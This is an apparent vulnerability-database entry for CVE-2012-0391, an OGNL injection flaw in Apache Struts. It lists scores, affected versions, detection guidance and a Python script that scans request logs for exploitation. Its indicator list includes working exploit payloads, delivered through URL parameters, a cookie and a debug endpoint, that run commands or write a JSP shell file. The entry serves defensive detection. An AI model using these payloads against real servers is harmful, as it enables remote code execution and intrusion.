CVE-2012-0391
published 2012-01-08


Priority: P194 (critical) · CVSS 3.1: 9.8
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: KEV, ITW, EXPLOIT
CISA Known Exploited Vulnerability (due 2022-07-21)
Exploited in the wild
EPSS: 75.07% (99.4th percentile)
The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets parameter values as OGNL expressions during certain exception handling for mismatched data types of properties, which allows remote attackers to execute arbitrary Java code via a crafted parameter.

Affected

1 range
Vendor   Product   Version range   Fixed in
apache   struts    < 2.2.3.1       2.2.3.1

Detection & IOCs (extracted from sources)

url: /Test.action?id='%2b(new+java.io.BufferedWriter(new+java.io.FileWriter("C:/wwwroot/sec-consult.jsp")).append("jsp+shell").close())%2b'
url: /Test.action?id='%2b(%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b'
cookie: (#_memberAccess["allowStaticMethodAccess"]\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1
url: /Test.action?debug=command&expression=%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc')
command: '%2b(%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec("CMD"))%2b'
command: '%2b(%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec("CMD".split("@")))%2b'
  • Detect OGNL injection attempts in HTTP parameters: look for URL-encoded OGNL payloads containing '%23_memberAccess' or '@java.lang.Runtime@getRuntime' in GET/POST parameter values, which indicate exploitation of the ExceptionDelegator type-mismatch code path.
  • Detect OGNL injection via Cookie header: monitor for Cookie headers containing '#_memberAccess' or '\u003d' (Unicode-encoded '=') combined with '@java.lang.Runtime@getRuntime().exec' patterns, as used in the cookie-based attack vector.
  • Detect use of the Struts developer-mode debug endpoint as an attack vector: requests containing 'debug=command&expression=' with OGNL payloads should be flagged, as this endpoint evaluates arbitrary OGNL expressions.
  • The Metasploit module targets the TARGETURI parameter, replacing an INJECT placeholder with the OGNL payload; monitor for GET requests to Struts action URLs containing '%2b(' and '%23_memberAccess' in parameter values as a strong exploitation indicator.
  • The vulnerability affects Apache Struts versions up to and including 2.2.3 (before 2.2.3.1); the Metasploit module specifically targets versions < 2.2.1.1, while the original advisory confirms 2.3.1 and below are vulnerable. Ensure version scoping is correct when applying detections.
  • The cookie-based and debug-endpoint attack vectors (PoC 2 and 3) were confirmed against Struts 2.2.1.1, 2.2.3.1, and 2.3.1, meaning the fixed version 2.2.3.1 is still vulnerable to those specific vectors; detections should not assume 2.2.3.1 is fully safe.
  • Developer mode ('debug=command') must be disabled as a workaround; applications running in developer mode expose an additional OGNL expression evaluation endpoint that is independently exploitable.
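
The detection notes above, sketched as a log-scanning check. This is an added example, not code from the sources this entry summarises: the rule names, the normalize and scan_request helpers and the sample requests are constructed for illustration, reusing only the indicator strings listed above. It decodes percent-encoding (up to two layers) and \uXXXX escapes before matching, so that encoded variants of the same indicators are caught.

```python
import re
from urllib.parse import unquote

# Indicator patterns from the detection notes above, applied to normalised text.
RULES = {
    "ognl-member-access": re.compile(r"#_memberaccess", re.I),
    "ognl-runtime-exec": re.compile(r"@java\.lang\.runtime@getruntime", re.I),
    "struts-debug-endpoint": re.compile(r"debug=command&expression=", re.I),
    "ognl-concat-breakout": re.compile(r"\+\(.*#_memberaccess", re.I),
}

def normalize(value: str) -> str:
    """Undo form '+' spaces, up to two layers of percent-encoding, and \\uXXXX escapes."""
    value = value.replace("+", " ")
    for _ in range(2):
        value = unquote(value)
    return re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), value)

def scan_request(target: str, cookie: str = "") -> list[str]:
    """Return 'field:rule' labels for every rule matching the request target or Cookie header."""
    hits = []
    for field, raw in (("query", target), ("cookie", cookie)):
        text = normalize(raw)
        hits += [f"{field}:{name}" for name, rx in RULES.items() if rx.search(text)]
    return hits

# Constructed sample requests (target, Cookie header); indicator strings are the ones listed above.
SAMPLES = [
    (r"""/Test.action?id='%2b(%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc'))%2b'""", ""),
    ("/Test.action", r"""(#_memberAccess["allowStaticMethodAccess"]\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1"""),
    (r"""/Test.action?debug=command&expression=%23_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('calc')""", ""),
    ("/Test.action?id=%2523_memberAccess", ""),  # double-encoded '#'
    ("/Test.action?id=42&name=a+b", ""),         # benign request
]

if __name__ == "__main__":
    for target, cookie in SAMPLES:
        print(scan_request(target, cookie) or "clean", "<-", target[:40])
```

Because the rules match on decoded text, they should be run against raw request lines and Cookie headers as logged, before any upstream component rewrites them.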

CVSS provenance

Source          Version   Score   Severity   Vector
nvd             v3.1      9.8     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd             v2.0      9.3     CRITICAL   AV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck       -         9.8     CRITICAL   -
cisa            -         9.8     CRITICAL   -
vendor_redhat   -         9.8     CRITICAL   -